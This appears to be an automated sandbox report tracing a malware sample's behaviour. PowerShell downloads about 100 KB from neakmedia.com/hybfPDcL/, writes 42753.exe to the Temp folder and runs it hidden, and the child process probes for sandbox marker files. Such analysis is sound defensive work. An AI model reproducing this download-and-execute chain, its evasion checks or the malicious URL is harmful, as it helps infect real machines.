| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Environment |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
9 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance |
|
1 | ||
| Open Key | HKEY_CURRENT_USER |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe | show_window = SW_SHOWNORMAL |
|
1 | |
| Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\pOwerSheLL.exe, size = 2048 |
|
1 | ||
| Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\pOwerSheLL.exe, size = 260 |
|
2 | ||
| Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | ||
| Map | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
1 | |
| Get Info | type = Operating System |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
10 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
10 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
114 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| Get Environment String | name = temp, result_out = C:\Users\BGC6U8~1\AppData\Local\Temp |
|
2 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = neakmedia.com, address_out = 70.39.145.109, service = 0 |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.07 KB (72 bytes) |
| Total Data Received | 100.39 KB (102804 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | 70.39.145.109:80 |
| Information | Value |
|---|---|
| Handle | 0x530 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 70.39.145.109 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 1728 |
| Data Sent | 0.07 KB (72 bytes) |
| Data Received | 100.39 KB (102804 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 70.39.145.109, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 72, size_out = 72 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8972 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3752 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4960 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 23232 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 57785, size_out = 45012 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 12773, size_out = 4356 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 8417, size_out = 1452 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 6965, size_out = 6965 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
3 | |
| Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.07 KB (72 bytes) |
| Total Data Received | 100.39 KB (102804 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | neakmedia.com |
| Information | Value |
|---|---|
| Server Name | neakmedia.com |
| Server Port | 80 |
| Data Sent | 0.07 KB (72 bytes) |
| Data Received | 100.39 KB (102804 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = neakmedia.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /hybfPDcL/ |
|
1 | |
| Send HTTP Request | headers = host: neakmedia.com, connection: Keep-Alive, url = neakmedia.com/hybfPDcL/ |
|
1 | |
| Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Read Response | size = 65536, size_out = 8972 |
|
1 | |
| Read Response | size = 65536, size_out = 3752 |
|
1 | |
| Read Response | size = 65536, size_out = 4960 |
|
1 | |
| Read Response | size = 65536, size_out = 23232 |
|
1 | |
| Read Response | size = 57785, size_out = 45012 |
|
1 | |
| Read Response | size = 12773, size_out = 4356 |
|
1 | |
| Read Response | size = 8417, size_out = 1452 |
|
1 | |
| Read Response | size = 6965, size_out = 6965 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
3 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Close Session |
|
1 |
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\users\bgc6u8~1\appdata\local\temp\42753.exe |
| Command Line | "C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:47, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:38 |
| Information | Value |
|---|---|
| PID | 0xad0 |
| Parent PID | 0xa68 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AD4
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\email.doc | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\a\foobar.bmp | desired_access = GENERIC_READ |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe | os_pid = 0xae4, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x76890000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x764f0000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76590000 |
|
2 | |
| Load | ntdll.dll | base_address = 0x772a0000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x76b40000 |
|
1 | |
| Load | winhttp.dll | base_address = 0x71a10000 |
|
7 | |
| Load | urlmon.dll | base_address = 0x76f00000 |
|
7 | |
| Load | wininet.dll | base_address = 0x77040000 |
|
7 | |
| Get Handle | c:\users\bgc6u8~1\appdata\local\temp\42753.exe | base_address = 0x400000 |
|
1 | |
| Get Filename | c:\users\bgc6u8~1\appdata\local\temp\42753.exe | process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 259 |
|
1 | |
| Get Filename | process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\user32.dll | function = GetMessagePos, address_out = 0x768c6703 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 |
|
1 | ||
| Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
